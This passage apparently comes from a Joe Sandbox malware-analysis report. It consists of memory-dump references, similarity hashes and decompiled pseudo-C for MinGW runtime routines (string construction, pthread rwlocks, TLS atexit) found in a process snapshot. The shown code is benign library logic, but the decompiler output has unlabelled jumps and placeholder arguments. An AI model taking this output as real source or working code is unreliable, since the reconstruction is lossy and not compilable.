                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcmp$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                        • API String ID: 3738950036-1697194757
                        • Opcode ID: d2db66f1782767528f9d5823a76a691d716c7bc900fd341201d906c179976288
                        • Instruction ID: 051e7203b038ebea47f7f5a095424bd9f6ef31dc3ac7e979713c803b2c52e465
                        • Opcode Fuzzy Hash: d2db66f1782767528f9d5823a76a691d716c7bc900fd341201d906c179976288
                        • Instruction Fuzzy Hash: EA51C692B0569652EE309A26DD023F55299DF0CBE0F5C4271EE2CE77E5EE1CED869300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935EC350(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
                        				signed int _t6;
                        				long long _t15;
                        				long long _t17;
                        				signed char* _t18;
                        
                        				_t17 =  *((intOrPtr*)(__rdx + 8));
                        				_t15 = __rcx + 0x10;
                        				 *__rcx = _t15;
                        				_t18 =  *((intOrPtr*)(__rdx));
                        				if (__eflags == 0) goto 0x935ec376;
                        				if (_t18 == 0) goto 0x935ec3e2;
                        				if (_t17 - 0xf > 0) goto 0x935ec3b0;
                        				if (_t17 != 1) goto 0x935ec3a0;
                        				_t6 =  *_t18 & 0x000000ff;
                        				 *(__rcx + 0x10) = _t6;
                        				 *((long long*)(__rcx + 8)) = _t17;
                        				 *((char*)(_t15 + _t17)) = 0;
                        				return _t6;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-4165567116
                        • Opcode ID: ce8e2d38325566c7c0c8c1d2c5911396e3a9db0cd6777e9dbd56732d05f63734
                        • Instruction ID: 1d6b2e9d8bf5e60890528f3d687d6f44612b3703dc7cfadbe2a8dc577a92049d
                        • Opcode Fuzzy Hash: ce8e2d38325566c7c0c8c1d2c5911396e3a9db0cd6777e9dbd56732d05f63734
                        • Instruction Fuzzy Hash: C851B373E05B4291EB30AF25D4421B873A8FB1DF94B9446B2CA6DA7391EE3CD956D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935EC900(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
                        				signed int _t6;
                        				long long _t15;
                        				long long _t17;
                        				signed char* _t18;
                        
                        				_t17 =  *((intOrPtr*)(__rdx + 8));
                        				_t15 = __rcx + 0x10;
                        				 *__rcx = _t15;
                        				_t18 =  *((intOrPtr*)(__rdx));
                        				if (__eflags == 0) goto 0x935ec926;
                        				if (_t18 == 0) goto 0x935ec992;
                        				if (_t17 - 0xf > 0) goto 0x935ec960;
                        				if (_t17 != 1) goto 0x935ec950;
                        				_t6 =  *_t18 & 0x000000ff;
                        				 *(__rcx + 0x10) = _t6;
                        				 *((long long*)(__rcx + 8)) = _t17;
                        				 *((char*)(_t15 + _t17)) = 0;
                        				return _t6;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-4165567116
                        • Opcode ID: 83a3d6c2ada1231e204cb2f150e8377795d645e0b2d449cfe8e20997b39be8e3
                        • Instruction ID: 4938072fdbe8194c5cbdeacc2267e6c75466303aa8da599bba2abe0eb4a634ce
                        • Opcode Fuzzy Hash: 83a3d6c2ada1231e204cb2f150e8377795d645e0b2d449cfe8e20997b39be8e3
                        • Instruction Fuzzy Hash: 8051C472E05B8290EB30AF25D4421B87368FB1CF94B4452B2CA6DA7391EF2CE556D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00007FF67FF6935D4920(void* __ecx, void* __rax, long long __rcx, void* __rdx, void* __r12, void* __r13) {
                        				int _t39;
                        				int _t42;
                        				void* _t81;
                        				intOrPtr _t82;
                        				intOrPtr _t84;
                        				intOrPtr _t86;
                        				intOrPtr _t88;
                        				intOrPtr _t91;
                        				intOrPtr _t93;
                        				long _t95;
                        				intOrPtr* _t97;
                        				intOrPtr* _t98;
                        				long long _t120;
                        
                        				_t81 = __rax;
                        				_t120 = __rcx;
                        				E00007FF67FF6935D2100(__ecx, __rdx);
                        				 *((long long*)(_t81 + 8)) = _t120;
                        				if ( *((intOrPtr*)(_t81 + 0x1d8)) == 0) goto 0x935d4949;
                        				E00007FF67FF6935D2640(_t81,  *((intOrPtr*)(_t81 + 0x1d8)));
                        				if (( *(_t81 + 0x40) & 0x00000030) == 0) goto 0x935d49e8;
                        				_t97 =  *0x935f8900; // 0x7ff6936023e0
                        				_t82 =  *_t97;
                        				if (_t82 == 0) goto 0x935d49c9;
                        				if ( *((long long*)(_t82 + 0x30)) != 0) goto 0x935d49e2;
                        				 *((long long*)( *_t97 + 0x30)) = 0x935f3fb8;
                        				TlsGetValue(_t95);
                        				if (0x935f3fb8 == 0) goto 0x935d49c0;
                        				if ( *0x7FF6935F3FE0 == 0) goto 0x935d49fa;
                        				 *0x7FF6935F4074 = 1;
                        				r13d =  *0x7FF6935F3FC0;
                        				if ( *((intOrPtr*)(0x7ff6935f3fe8)) == 0) goto 0x935d49ab;
                        				CloseHandle(__r12);
                        				 *((long long*)(0x7ff6935f3fe8)) = 0;
                        				if (( *0x7FF6935F3FFC & 0x00000004) != 0) goto 0x935d4a4d;
                        				__imp___endthreadex();
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(0x7ff6935f3fe8)) == 0) goto 0x935d4969;
                        				_t84 =  *_t97;
                        				if (_t84 != 0) goto 0x935d49e2;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d4977;
                        				_t18 = _t97 + 0xd0; // 0xd0
                        				__imp__longjmp();
                        				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x30)))) = 0xdeadbeef;
                        				if (_t18 == 0) goto 0x935d4a0b;
                        				_t39 = CloseHandle(__r13);
                        				 *((long long*)(0x7ff6935f3fe8)) = 0;
                        				r13d =  *((intOrPtr*)(0x7ff6935f3fc0));
                        				E00007FF67FF6935D20E0(_t39, 0x935f3fb8);
                        				_t86 =  *_t97;
                        				if (_t86 == 0) goto 0x935d4a96;
                        				if ( *((long long*)(_t86 + 0x30)) != 0) goto 0x935d4a80;
                        				 *((long long*)(_t86 + 0x30)) = 0x935f3fb8;
                        				TlsSetValue(??, ??);
                        				goto 0x935d49c0;
                        				 *0x935f3fb8 = 0xdeadbeef;
                        				_t42 = CloseHandle(??);
                        				 *((long long*)(0x7ff6935f3fe0)) = 0;
                        				E00007FF67FF6935D20E0(_t42, 0x935f3fb8);
                        				_t88 =  *_t97;
                        				if (_t88 == 0) goto 0x935d4ab4;
                        				if ( *((long long*)(_t88 + 0x30)) == 0) goto 0x935d4a86;
                        				goto 0x935d4a3e;
                        				 *((long long*)( *_t97 + 0x30)) = 0x935f3fb8;
                        				goto 0x935d4a3e;
                        				E00007FF67FF6935D6420();
                        				_t91 =  *_t97;
                        				if ( *((long long*)(0x7ff6935f3fe8)) == 0) goto 0x935d4a30;
                        				if (_t91 != 0) goto 0x935d4a80;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d4a80;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t91 + 0x30)) == 0) goto 0x935d4a86;
                        				goto 0x935d4aa8;
                        				asm("o16 nop [cs:eax+eax]");
                        				_push(_t97);
                        				_t98 =  *0x935f8900; // 0x7ff6936023e0
                        				_t93 =  *_t98;
                        				if (_t93 == 0) goto 0x935d4b20;
                        				if ( *((long long*)(_t93 + 0x18)) != 0) goto 0x935d4b40;
                        				 *((long long*)(_t93 + 0x18)) = 0x936023b0;
                        				if ( *0x936023b0 == 0) goto 0x935d4b10;
                        				E00007FF67FF6935D2100( *0x936023b0, 0x936023b0);
                        				if (0x936023b0 == 0) goto 0x935d4b10;
                        				if ( *0x7FF6936023D0 <= 0) goto 0x935d4b50;
                        				return 0;
			}

                        APIs
                        Memory Dump Source
• Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
• Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
• Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleValue$_endthreadexlongjmp
                        • String ID:
                        • API String ID: 3990644698-0
                        • Opcode ID: 944f30e4a3dfae3aef5af77ddd4317e1601b2d20f29d1d17dc9970a67e0fc127
                        • Instruction ID: 72a8be3d3cbda45b3f004954aca074c6b48d0b7c7ee65e50a2f0fc7c22b00f57
                        • Opcode Fuzzy Hash: 944f30e4a3dfae3aef5af77ddd4317e1601b2d20f29d1d17dc9970a67e0fc127
                        • Instruction Fuzzy Hash: 92511B71A19B0281FBB49B52D45737A36A9FF48B48F1541BACE2DA7391DF3CA844C305
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D6C70(void* __edx, intOrPtr* __rcx) {
                        				intOrPtr _t19;
                        				intOrPtr _t23;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t29 =  *0x935f8900; // 0x7ff6936023e0
                        				_t19 =  *_t29;
                        				r12d = __edx;
                        				if (_t19 == 0) goto 0x935d6d08;
                        				if ( *((long long*)(_t19 + 0xa0)) != 0) goto 0x935d6d28;
                        				 *((long long*)(_t19 + 0xa0)) = 0x935f3fc8;
                        				E00007FF67FF6935D7BF0(0x935f3fc8, _t28);
                        				if ( *((intOrPtr*)( *__rcx)) != 0xbab1f0ed) goto 0x935d6d69;
                        				if ( *((intOrPtr*)( *__rcx + 4)) <= 0) goto 0x935d6d69;
                        				 *((intOrPtr*)( *__rcx + 4)) =  *((intOrPtr*)( *__rcx + 4)) - 1;
                        				_t23 =  *_t29;
                        				if (_t23 == 0) goto 0x935d6d38;
                        				if ( *((long long*)(_t23 + 0xa0)) != 0) goto 0x935d6d60;
                        				 *((long long*)(_t23 + 0xa0)) = 0x935f3fc8;
                        				E00007FF67FF6935D7C30(0x935f3fc8);
                        				return r12d;
			}

                        Strings
                        Similarity
                        • API ID:
                        • String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
                        • API String ID: 0-3957588491
                        • Opcode ID: 58f877f3f909de77631ad4f4d2eaaa299914e596ef7d9396fdd29e6e52ca8098
                        • Instruction ID: 3e087b98602dcb3633f3a8ad65958e2b20c7cc631afc5e228dd78f7816dbaafe
                        • Opcode Fuzzy Hash: 58f877f3f909de77631ad4f4d2eaaa299914e596ef7d9396fdd29e6e52ca8098
                        • Instruction Fuzzy Hash: E1316F22A0974A85EB30AB55E0523B927A8FF4DB48F8581B6DA5CA7391DF3CE446C301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D92F0(void* __edx, void* __rcx, void* __r8) {
                        
                        				r12d = __edx;
                        				if (__r8 == 0) goto 0x935d9361;
                        				if (__rcx != 0) goto 0x935d9320;
                        				if (r12d != 0) goto 0x935d934d;
                        				return r12d;
			}

                        APIs
                        Similarity
                        • API ID: Process$CloseCurrentHandleOpen_errno
                        • String ID:
                        • API String ID: 2250453136-0
                        • Opcode ID: 04e03e2c1dcd1a72f894048ec280e35dd20f76688bdde7239ccd22cc7b8ef187
                        • Instruction ID: a405e7c3ee50fdc38f8140278d1653b5c0d9c915cc0cde0cf5f912876c8ee2f9
                        • Opcode Fuzzy Hash: 04e03e2c1dcd1a72f894048ec280e35dd20f76688bdde7239ccd22cc7b8ef187
                        • Instruction Fuzzy Hash: 3301C03190CA03D6FA351F669847138229AFF08B25F6412B9CA3EB66D4DE3C6484D320
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Similarity
                        • API ID: CriticalSection$EnterLeave_assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 4191840866-4180103562
                        • Opcode ID: 9e74119ed8410213880c531de6a50795c84e3aedb6eec8cab171008625c93a47
                        • Instruction ID: 0e3bf137bc96c63b486c8b9c24312760d75ccffe9c9cb30a7bee8d543f62ded4
                        • Opcode Fuzzy Hash: 9e74119ed8410213880c531de6a50795c84e3aedb6eec8cab171008625c93a47
                        • Instruction Fuzzy Hash: 3F015B31A0860751FB318B56F8532B82698EF4C795FC540B0CA2CE73A5EE6CE985D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Similarity
                        • API ID: CurrentThreadfprintf
                        • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                        • API String ID: 1384477639-884133013
                        • Opcode ID: d404a1d808709ea5ee6d1ee9474c52aa295e18b92de93962cff9c7e3f0327dee
                        • Instruction ID: aaf07727c807eaf7ccf6dfd88a6e985a74220fa682d2ccc3edfce5f01ba61020
                        • Opcode Fuzzy Hash: d404a1d808709ea5ee6d1ee9474c52aa295e18b92de93962cff9c7e3f0327dee
                        • Instruction Fuzzy Hash: 3D018476A0970686FA319F26F8124683768FB48BD8B948075DD5CA3354DF3CE445D700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 25%
                        			E00007FF67FF6935CE507(void* __eax, intOrPtr* __rax, void* __rcx, long long __rdx, void* __r8) {
                        				intOrPtr _t5;
                        				long long _t17;
                        				int _t18;
                        				struct _CRITICAL_SECTION* _t27;
                        				struct _CRITICAL_SECTION* _t30;
                        
                        				asm("loopne 0x2b");
                        				 *__rax =  *__rax + __eax + 0xe8fffffe;
                        				goto 0x935ce3d6;
                        				asm("o16 nop [cs:eax+eax]");
                        				_t5 =  *0x93602190; // 0x1
                        				if (_t5 == 0) goto 0x935ce5c0;
                        				if (__r8 == 0) goto 0x935ce565;
                        				if (__r8 == 0x93602180) goto 0x935ce565;
                        				r8d = 0x2b;
                        				0x935e0b30();
                        				calloc(_t18);
                        				if (0x93602180 == 0) goto 0x935ce5c0;
                        				 *0x93602180 = __rcx;
                        				 *0x7FF693602188 = __rdx;
                        				EnterCriticalSection(_t30);
                        				_t17 =  *0x93602188; // 0x0
                        				 *0x93602188 = 0x93602180;
                        				 *0x7FF693602190 = _t17;
                        				LeaveCriticalSection(_t27);
                        				return 0;
			}

                        APIs
                        Strings
                        Similarity
                        • API ID: CriticalSection$EnterLeave_assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 4191840866-4180103562
                        • Opcode ID: 3580572c2aa0ca8fd24a54655ed253ffd0d82b700cfa713592cc6607b4844b2f
                        • Instruction ID: 11c3d4578ea7521014898c75278f4fa44d962c88ede9add8ae769896595aff08
                        • Opcode Fuzzy Hash: 3580572c2aa0ca8fd24a54655ed253ffd0d82b700cfa713592cc6607b4844b2f
                        • Instruction Fuzzy Hash: 14112732A0870396FA228B51F8422B82698EF48795FC540B0CA1CE73A5EE6CE985D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CC1B0(void* __rax, void* __rcx, intOrPtr* __r8) {
                        				intOrPtr _t13;
                        				signed char _t14;
                        				signed long long _t41;
                        
                        				if (__r8 == 0) goto 0x935cc253;
                        				r13d = 1;
                        				goto 0x935cc249;
                        				if ( *((intOrPtr*)(__r8 + 0x10)) != 0) goto 0x935cc241;
                        				_t13 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
                        				if (r9d != 0) goto 0x935cc205;
                        				_t14 = __rax - 0x1c;
                        				if (_t14 - 0x34 > 0) goto 0x935cc205;
                        				if ((_t41 << _t14 & 0x0000001f) != 0) goto 0x935cc241;
                        				 *((intOrPtr*)(__r8 + 0x10)) = 1;
                        				 *((long long*)(__rcx + 0x120)) =  *((intOrPtr*)(__r8 + 0x18));
                        				if (_t13 == 0x29) goto 0x935cc260;
                        				if (_t13 == 0x2a) goto 0x935cc284;
                        				if (_t13 == 2) goto 0x935cc2a8;
                        				E00007FF67FF6935CB440();
                        				if ( *__r8 == 0) goto 0x935cc253;
                        				if ( *((intOrPtr*)(__rcx + 0x130)) == 0) goto 0x935cc1e0;
                        				return _t13;
			}

                        Strings
                        Similarity
                        • API ID:
                        • String ID: :$default arg#${$}$}::
                        • API String ID: 0-1396675520
                        • Opcode ID: 04110fe1303ae23170d01067f21a2379a8b7f15fb229e823970e9b9ad86e3a7e
                        • Instruction ID: 840abf1d16b60215b648b9c3d80b1b4e18cf891d98f43f7c56298066c681eaac
                        • Opcode Fuzzy Hash: 04110fe1303ae23170d01067f21a2379a8b7f15fb229e823970e9b9ad86e3a7e
                        • Instruction Fuzzy Hash: 6E91D276A0868687EB798A25A4413FE6295FB49B9CF088075CF9A57781DF7CE482D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CEA80(void* __rcx) {
                        				long _t1;
                        
                        				_t1 = GetLastError();
                        				if (_t1 != 0) goto 0x935ceaa0;
                        				return _t1;
			}

                        APIs
                        Similarity
                        • API ID: DebuggerErrorFormatLastMessagePresent
                        • String ID:
                        • API String ID: 2392558662-0
                        • Opcode ID: 4c457b08ee5fe6163a4bbb9ae9242caa92ab86db018097a815e4e33e85b27bec
                        • Instruction ID: 50ad99a3ce92f3c53f5fa62bb0029a2d9e7250ad933e3706a1df56bd2535a6e5
                        • Opcode Fuzzy Hash: 4c457b08ee5fe6163a4bbb9ae9242caa92ab86db018097a815e4e33e85b27bec
                        • Instruction Fuzzy Hash: 72016D31A0CA4285FA718B26BC4B3292768FB88B8AF584078DE5DE7664EE3CD0449700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Similarity
                        • API ID: CurrentThread$printf
                        • String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
                        • API String ID: 2165381015-1971217749
                        • Opcode ID: ac527e257bc644afdc54ffcc70c90d90c99f59a4247c97737c9fd21a4bb84b0f
                        • Instruction ID: 92b7d8343dd1bde7989de99fbbc0c32ee2fdc9eb9c8a1bc333876fa3f3c94f3e
                        • Opcode Fuzzy Hash: ac527e257bc644afdc54ffcc70c90d90c99f59a4247c97737c9fd21a4bb84b0f
                        • Instruction Fuzzy Hash: C001D232608A4586F7318B16E80276A77A8EB88FD8F545075DE1D93390EF3CD485CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E00007FF67FF6935D81D0(void* __edx, long long __rax, long long __rcx, void* __r9) {
                        				long long _v48;
                        				char _v56;
                        				void* _t6;
                        				void* _t9;
                        				void* _t17;
                        				long long _t25;
                        
                        				_t25 = __rax;
                        				r12d = r8d;
                        				if (__edx == 1) goto 0x935d8250;
                        				_v56 = __rcx;
                        				E00007FF67FF6935D47E0(__rax);
                        				_v48 = _t25;
                        				if (_t25 == 0) goto 0x935d82e0;
                        				r8d = 0;
                        				r9d = r12d;
                        				_t6 = E00007FF67FF6935D6920(2, _t25,  &_v56, __r9);
                        				_t17 = _t6 - 0x80;
                        				if (_t17 == 0) goto 0x935d8440;
                        				if (_t17 > 0) goto 0x935d8298;
                        				if (_t6 == 0) goto 0x935d8280;
                        				if (_t6 != 1) goto 0x935d8400;
                        				ResetEvent(??);
                        				if (__edx != 2) goto 0x935d8489;
                        				E00007FF67FF6935D4CA0(2, _t25,  &_v56);
                        				goto 0x935d8205;
                        				_t9 = E00007FF67FF6935D6880(r8d, _t25, _v48,  &_v56);
                        				if (_t9 == 0x80) goto 0x935d841d;
                        				if (_t9 == 0x102) goto 0x935d8418;
                        				r12d = 0x16;
                        				if (_t9 != 0) goto 0x935d8283;
                        				r12d = 0;
                        				return r12d;
                        			}

                        Listing addresses 0x7ff6935d81d0 to 0x7ff6935d8291 (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                        • String ID:
                        • API String ID: 256776027-0
                        • Opcode ID: 6a2e3cb6e530c899bcad0da2263d151bed46981e0c37d3174faaf7f9b013440c
                        • Instruction ID: 5975085b2dc7dfd4486a825992b1a7651c7d5bcb72d8feb4357f132053a83989
                        • Opcode Fuzzy Hash: 6a2e3cb6e530c899bcad0da2263d151bed46981e0c37d3174faaf7f9b013440c
                        • Instruction Fuzzy Hash: F1512B21E1C50341FBB56666A90737E019DFF88798F5840B3DE3EE26D1ED6CED819212
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: basic_string::append
                        • API String ID: 1844840824-3811946249
                        • Opcode ID: a7a3cd996bfde3b224dbfa221b0ab7f1a2ff53d3b97cdf5a41004b6dec482a96
                        • Instruction ID: 4e0649ac8dfda898adab92e3a130fa6edb268c229888b294ce2417eb48e31ef8
                        • Opcode Fuzzy Hash: a7a3cd996bfde3b224dbfa221b0ab7f1a2ff53d3b97cdf5a41004b6dec482a96
                        • Instruction Fuzzy Hash: 7B51AE66A28B45A0EA30DB56C40A4BD6369FB49BC4B958572DE1DE73E0EF3CE585C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: basic_string::append
                        • API String ID: 2619041689-3811946249
                        • Opcode ID: e1d2ad597746bf7c1658432626b76abdacf8226b74ba6b7c3493d97fc326c1ab
                        • Instruction ID: 0cdbbcde0ef34ba1884c0239abf4f39c3a404395a916cafb26ab2e6b508be563
                        • Opcode Fuzzy Hash: e1d2ad597746bf7c1658432626b76abdacf8226b74ba6b7c3493d97fc326c1ab
                        • Instruction Fuzzy Hash: A451F7A7A0878690DE30EB25D45A57D3368FB49BD4F8545B2ED6EA73D2DE2CD441C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935EFA80(long long* __rcx, void* __rdx) {
                        				long long _t14;
                        				signed long long _t16;
                        				signed long long _t18;
                        				signed long long _t19;
                        
                        				_t19 =  *((intOrPtr*)(__rdx + 8));
                        				_t16 = _t19 + _t19;
                        				_t14 = __rcx + 0x10;
                        				_t18 = _t16 >> 1;
                        				 *__rcx = _t14;
                        				if (_t16 - 0xe > 0) goto 0x935efaf0;
                        				if (_t18 == 1) goto 0x935efae0;
                        				if (_t18 != 0) goto 0x935efad0;
                        				 *(__rcx + 8) = _t18;
                        				 *((short*)(_t14 + _t19 * 2)) = 0;
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935efa8a to 0x7ff6935efacb (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-126128797
                        • Opcode ID: be1622a82ea9c72d03a65a45040e82aae806f7373a59d638aff1f1c2b3b500d5
                        • Instruction ID: 5091e551dd03ee80b70f9286d316f381720522010f9334d6eaf353fd0ebd5c80
                        • Opcode Fuzzy Hash: be1622a82ea9c72d03a65a45040e82aae806f7373a59d638aff1f1c2b3b500d5
                        • Instruction Fuzzy Hash: 8341D3B3B05B46A4EA309F19D4025BC6369FB1CF98B945672CA1CA73A4EF3CD596D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935EF5C0(long long* __rcx, void* __rdx) {
                        				long long _t14;
                        				signed long long _t16;
                        				signed long long _t18;
                        				signed long long _t19;
                        
                        				_t19 =  *((intOrPtr*)(__rdx + 8));
                        				_t16 = _t19 + _t19;
                        				_t14 = __rcx + 0x10;
                        				_t18 = _t16 >> 1;
                        				 *__rcx = _t14;
                        				if (_t16 - 0xe > 0) goto 0x935ef630;
                        				if (_t18 == 1) goto 0x935ef620;
                        				if (_t18 != 0) goto 0x935ef610;
                        				 *(__rcx + 8) = _t18;
                        				 *((short*)(_t14 + _t19 * 2)) = 0;
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935ef5ca to 0x7ff6935ef60b (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-126128797
                        • Opcode ID: 63e0ce7270c2b737f1747fb4061735288a54b87dc3d29fbdd0ea6ed819afa5ff
                        • Instruction ID: 47d130116544cccbc99052833b1818d0047563f7db61a5c83e57435ed88af8f3
                        • Opcode Fuzzy Hash: 63e0ce7270c2b737f1747fb4061735288a54b87dc3d29fbdd0ea6ed819afa5ff
                        • Instruction Fuzzy Hash: 7B41F4B3B05B46A5EA309F19D4025BC6369FB1CF94B945672CA1CA73A0EF3CD596D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CFA00(void* __rax, intOrPtr* __rcx, void* __rdx) {
                        				void* _t4;
                        				void* _t20;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t24 = __rdx;
                        				_t20 = __rax;
                        				_t27 = __rcx;
                        				if (__rdx == 0) goto 0x935cfa2f;
                        				E00007FF67FF6935D67C0(_t4, __rdx);
